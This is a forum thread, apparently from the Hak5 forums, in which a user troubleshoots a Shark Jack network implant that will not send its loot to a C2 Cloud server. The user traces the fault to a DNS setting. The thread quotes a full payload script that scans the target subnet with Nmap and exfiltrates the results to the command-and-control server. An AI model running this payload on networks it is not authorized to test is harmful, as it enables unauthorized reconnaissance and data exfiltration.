Jump to content

Sharkjack executes payloads but does not connect to C2


Peque
 Share

Recommended Posts

Hi Forum 

I've bought an essentialKit , and have the most of it running as expected. 

I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2
 

The Sharkjack is updated to to latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot are created etc. 
I can see that during execution of the payload, that the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud. 

As I can see - it should'n be an issue with my C2 Cloud - since I have Wifi Pineapple, lan Turtle and Squirrel running and connecting to C2 Cloud. 

How can I check this further, since as I can see - I can not SSH to the sharkjack during run of the payloads.  And have tried reconfiguring my C2 Cloud  settngs on the jack several times with out any luck. 

The Executed payload: 
 

#!/bin/bash
#
# Title:         Nmap Payload for Shark Jack w/ C2
# Author:        Hak5 (modifications from REDD)
# Version:       1.1
#
# All credit goes to Hak5 Team. I just through in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate! 
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.

C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap

# Setup loot directory, DHCP client, and determine subnet
LED SETUP                            
mkdir -p $LOOT_DIR                           
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT                          
while [ -z "$SUBNET" ]; do  
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done                                                                                                                                                    
                                                                                                                                                        
# Scan network                                                                                                                                          
LED ATTACK    
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi

LED FINISH                                                                          
sleep 2 && halt

Can I Just disable the last 2 lines - so I can SSh into the jack to see what and if there's an error while trying to connect to my C2 Cloud 
Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliever to my C2 Cloud. 

Any ideas of what is wrong 
/P

Link to comment
Share on other sites

Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?

Link to comment
Share on other sites

I have placed the device.config - in /etc/  

Yes - My C2 is running https. 
I have also tried the default payload --> with just should test this C2EXFIL - but still not getting anything ton my C2 Cloud. 

THe only thing i cc-client-error are these 3 lines repeating

[1646558183 !ERR     INITSYNC ]  Error in startup sync post
[1646558183 !ERR         MAIN ]  Device startup sync failed. Retrying... 
[1646558188 !ERR         CURL ]  Error posting update to server...

But other devices on the same network is working without problem. 

Well - Found the problem - Internal DNS 
Since this is just test setup at the moment, seperate network at home. 
/etc/resolv.conf --> only nameserver 127.0.0.1 
Adding my local DNS Server ( PFsense firewall) - and now I'm able to connect to the C2 Cloud. 
 

Extra: Is it possible to make it add this DNS server automatickly - as a failover DNS, so if the default dns - 127.0.0.1 does not resolve - then add a speficied extra DNS server

And thanks for the input - that gave me the answer
 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...